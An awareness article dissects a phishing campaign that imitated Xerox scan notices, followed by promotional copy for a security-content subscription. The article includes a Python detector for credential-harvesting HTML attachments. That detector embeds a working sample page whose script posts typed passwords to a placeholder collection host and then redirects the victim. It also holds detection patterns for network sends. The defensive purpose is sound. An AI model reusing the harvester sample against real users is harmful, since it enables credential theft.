Anatomy of a Phishing Scam

Recently, some attackers grew sloppy and exposed both the tactics and the results of a major phishing campaign.

The case, which was publicized by Check Point Research as an educational tool, offers a fascinating glimpse behind the scenes of a digital crime ring.

Like most phishing attacks, this one began with a fraudulent email template. In this case, the messages mimicked Xerox scan notifications and put the targeted employee’s name or title in the subject line to make the lure look personal.

The bogus emails were sent from email accounts that had previously been compromised, so they appeared to come from legitimate senders and carried none of the usual giveaways of a forged address. This is why you’re often warned that phishing attacks may appear to come from your boss—or your mom.

The payload

The attackers attached an HTML file containing embedded JavaScript with a single purpose: to steal credentials. Opening the file presented a login prompt. When a user typed a username and password into it, the script harvested the credentials and then forwarded the unsuspecting user to the legitimate login page, so nothing looked wrong.
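The harvesting pattern described above (a password prompt, a script that reads the typed values, a network send to a third-party host, and a redirect to the real site as cover) is something a mail gateway or analyst can look for before a user ever opens the attachment. The following triage script is an added example written for this page; it is not code from Check Point Research or from the campaign itself. The two HTML attachments it scans are constructed samples, the host names are reserved example domains, and the indicator regexes and the `triage_html_attachment` function are my own heuristics, not a published detection.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a credential-harvesting HTML attachment: a fake
# "scanned document" login prompt whose script reads the typed credentials,
# posts them to a third-party host, then forwards the victim to a real-looking
# login page. Hosts are reserved example names, not real infrastructure.
MALICIOUS_SAMPLE = """<html><body>
<h3>Scanned document ready</h3>
<form id="f"><input name="user" value="jane.doe@corp.example">
<input type="password" name="pass"><button>Open</button></form>
<script>
document.getElementById('f').onsubmit = function (e) {
  e.preventDefault();
  var u = document.getElementsByName('user')[0].value;
  var p = document.getElementsByName('pass')[0].value;
  fetch('https://collector.example.invalid/log.php', {method: 'POST', body: u + ':' + p})
    .finally(function () { window.location = 'https://login.example.com/'; });
};
</script></body></html>"""

# Constructed benign sample: has a script, but no prompt, no read, no send.
BENIGN_SAMPLE = """<html><body><p>Your scan is attached.</p>
<script>document.title = 'Scan 2024-03';</script></body></html>"""

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")

# Heuristic indicators evaluated against the inline script text (assumption:
# these four together characterise the harvester pattern described above).
INDICATORS = {
    "password_field": re.compile(r"type\s*=\s*['\"]?password", re.I),
    "reads_form_values": re.compile(r"\.value\b"),
    "network_send": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon|\$\.(?:ajax|post))\b"),
    "redirect": re.compile(r"\b(?:window\.|document\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]"),
}


class _Collector(HTMLParser):
    """Collects inline script bodies, external script URLs, form actions and input types."""

    def __init__(self):
        super().__init__()
        self.scripts, self.form_actions, self.input_types, self.script_srcs = [], [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands the raw <script> body to handle_data as one chunk.
        if self._in_script:
            self.scripts.append(data)


def triage_html_attachment(html: str) -> dict:
    """Return indicator hits, URLs reached by the page, and a verdict string."""
    c = _Collector()
    c.feed(html)
    script = "\n".join(c.scripts)
    hits = {name: bool(rx.search(script)) for name, rx in INDICATORS.items()}
    # A password prompt may be static markup rather than built by the script.
    hits["password_field"] = hits["password_field"] or "password" in c.input_types
    external_post = any(a.startswith("http") for a in c.form_actions)
    urls = sorted(set(URL_RE.findall(script) + c.script_srcs
                      + [a for a in c.form_actions if a.startswith("http")]))
    # Theft needs a prompt, a read and somewhere to send the values; the
    # redirect is only the cover-up, so it raises confidence but is not required.
    harvester = (hits["password_field"] and hits["reads_form_values"]
                 and (hits["network_send"] or external_post))
    verdict = "credential-harvester" if harvester else "no-harvesting-pattern"
    return {"hits": hits, "urls": urls, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage_html_attachment(sample))
```

The verdict deliberately keys on the combination rather than any single indicator: plenty of legitimate HTML has a script, a redirect, or a `fetch` call, but a standalone attachment that prompts for a password, reads it, and sends it somewhere is the signature of this attack. In practice the URL list is the most useful output, since it names the collection host to block and to search for in proxy logs.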

The key here is that none of this could happen unless email recipients fell for the phishing message, opened the attached HTML file and typed their credentials into the fake prompt. That’s a major error.

Apparently, though, it’s a mistake many people make—in this particular campaign, attackers successfully bypassed Microsoft Office 365 Advanced Threat Protection filtering and stole more than 1,000 corporate employees’ credentials, researchers noted.

Keep in mind that the world only learned of this phishing attack because the hackers failed to tie up a few loose ends, leaving a digital trail of their crime. That’s why it’s up to you to educate yourself about phishing, learn to spot the attacks … and never, ever open an attachment or click a link unless you’re certain of its legitimacy.

© National Security Institute, Inc.


Protect Yourself & Your Company From Cybercrime

Why shouldn’t your life be a little easier?

We want to make it super easy for you to market cybersecurity awareness to everyone at your company. We’re here to help you be more persuasive and support your work to make the entire company cyber-savvy.

Maybe you’re not a “marketer,” but you can be. You can get their attention with content that’s relatable, relevant, concise and enjoyable to read. We get feedback all the time from your peers who tell us their employees look forward to receiving SecuritySense.

SecuritySense is a subscription-based content service that delivers you a consistent supply of fresh cybersecurity awareness content so you can easily maintain an ongoing cybersecurity brand awareness campaign.

Our Unique Content Strategy

People pay attention to content they find personally relevant. SecuritySense doesn’t feel like you’re being given extra work to do. It’s a blend of personal and work-relevant cybersecurity tips, warnings, human interest stories, instructions, news and insights that everyone looks forward to receiving. More about our content strategy

The Secret to Creating Awareness

Brand marketers know if you want to create awareness you have to do two things. Steadily promote your message and make sure the message offers content that personally resonates with your audience. SecuritySense makes it easy for you to do both.

Compare Our Per Employee Cost

Compare our per employee annual cost with the $8.00 – $20.00 seat licenses you might pay for training platforms. It’s a no-brainer to add SecuritySense to your overall program.
See pricing